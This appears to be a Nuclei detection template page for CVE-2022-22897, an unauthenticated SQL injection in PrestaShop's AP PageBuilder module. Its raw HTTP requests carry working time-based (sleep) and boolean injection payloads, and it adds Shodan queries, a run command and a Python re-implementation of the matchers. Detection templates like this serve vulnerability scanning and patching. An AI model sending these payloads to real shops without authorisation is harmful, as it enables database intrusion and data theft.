PrestaShop AP Pagebuilder <= 2.4.4 - SQL Injection
ID: CVE-2022-22897
Severity: critical
Author: mastercho
Tags: time-based-sqli,cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme
Description
A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data.
YAML Source
id: CVE-2022-22897

info:
  name: PrestaShop AP Pagebuilder <= 2.4.4 - SQL Injection
  author: mastercho
  severity: critical
  description: |
    A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access and data leakage.
  remediation: |
    Upgrade PrestaShop Ap Pagebuilder to version 2.4.5 or later to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-22897
    - https://packetstormsecurity.com/files/cve/CVE-2022-22897
    - https://security.friendsofpresta.org/modules/2023/01/05/appagebuilder.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-22897
    cwe-id: CWE-89
    epss-score: 0.04685
    epss-percentile: 0.91818
    cpe: cpe:2.3:a:apollotheme:ap_pagebuilder:*:*:*:*:*:prestashop:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: apollotheme
    product: "ap_pagebuilder"
    framework: prestashop
    shodan-query:
      - "http.component:\"Prestashop\""
      - http.component:"prestashop"
  tags: time-based-sqli,cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme

http:
  - raw:
      - |
        GET /modules/appagebuilder/config.xml HTTP/1.1
        Host: {{Hostname}}

      - |
        @timeout: 20s
        POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}
        X-Requested-With: XMLHttpRequest

        leoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)

      - |
        @timeout: 20s
        POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}
        X-Requested-With: XMLHttpRequest

        leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6644=6644-- yMwI

      - |
        @timeout: 20s
        POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}
        X-Requested-With: XMLHttpRequest

        leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6643=6644-- yMwI

    host-redirects: true
    max-redirects: 3
    matchers-condition: or
    matchers:
      - type: dsl
        name: time-based
        dsl:
          - 'duration_2>=6'
          - 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
        condition: and

      - type: dsl
        name: blind-based
        dsl:
          - 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
          - 'contains(body_3, "content") && contains(body_3, "{{Hostname}}")'
          - '!contains(body_4, "content") && !contains(body_4, "{{Hostname}}")'
          - 'len(body_3) > 200 && len(body_4) <= 22'
        condition: and

    extractors:
      - type: regex
        name: version
        part: body_1
        internal: true
        group: 1
        regex:
          - "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"
# digest: 4b0a00483046022100e0cb1ebc205282a60c61836a2cf43090f3566c5eb4f363cc66266bf695bedb340221009d2ec2cdf3fcb4a7f3c9f6e6e68166d53dba249eb452fdee804794e0daaad1df:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects the vulnerability described above. Run it with the Nuclei tool against a target URL; a match is reported when the module version extracted from config.xml is <= 2.4.4 and either the time-based or the blind-based matcher fires:
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-22897.yaml"
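To make the template's decision logic concrete for anyone triaging a Nuclei hit, the following Python is an added illustration, not part of the template or of Nuclei: it extracts the module version from config.xml with the template's own regex and re-evaluates the time-based and blind-based matcher conditions on constructed sample values. The version comparison is a simplified numeric dotted compare (an assumption; Nuclei's compare_versions is semver-aware), and the sample config.xml is constructed, not a real capture.

```python
import re

# Version regex from the template's extractor; group 1 is the version string.
VERSION_RE = re.compile(r"<version>\s*<!\[CDATA\[(.*?)\]\]>\s*</version>")

# Constructed sample of /modules/appagebuilder/config.xml (not a real capture).
SAMPLE_CONFIG_XML = """<?xml version="1.0" encoding="UTF-8" ?>
<module>
  <name>appagebuilder</name>
  <version><![CDATA[2.4.4]]></version>
</module>"""


def extract_version(config_xml: str):
    """Return the module version from config.xml, or None if the tag is absent."""
    m = VERSION_RE.search(config_xml)
    return m.group(1).strip() if m else None


def is_affected(version: str) -> bool:
    """Simplified stand-in for compare_versions(version, "<= 2.4.4")."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version))
    return bool(parts) and parts <= (2, 4, 4)


def time_based_hit(status_code_1: int, version: str, duration_2: float) -> bool:
    """Mirror of the 'time-based' matcher: request 2 must stall for >= 6 seconds."""
    return status_code_1 == 200 and is_affected(version) and duration_2 >= 6


def blind_hit(status_code_1: int, version: str, hostname: str,
              body_3: str, body_4: str) -> bool:
    """Mirror of the 'blind-based' matcher: the always-true request (3) returns a
    normal page, the always-false request (4) returns an almost empty body."""
    true_branch = "content" in body_3 and hostname in body_3 and len(body_3) > 200
    false_branch = ("content" not in body_4 and hostname not in body_4
                    and len(body_4) <= 22)
    return status_code_1 == 200 and is_affected(version) and true_branch and false_branch


def template_matches(status_code_1: int, version: str, duration_2: float,
                     hostname: str, body_3: str, body_4: str) -> bool:
    """matchers-condition: or -- either matcher alone flags the host."""
    return (time_based_hit(status_code_1, version, duration_2)
            or blind_hit(status_code_1, version, hostname, body_3, body_4))


if __name__ == "__main__":
    v = extract_version(SAMPLE_CONFIG_XML)
    print(v, is_affected(v))
```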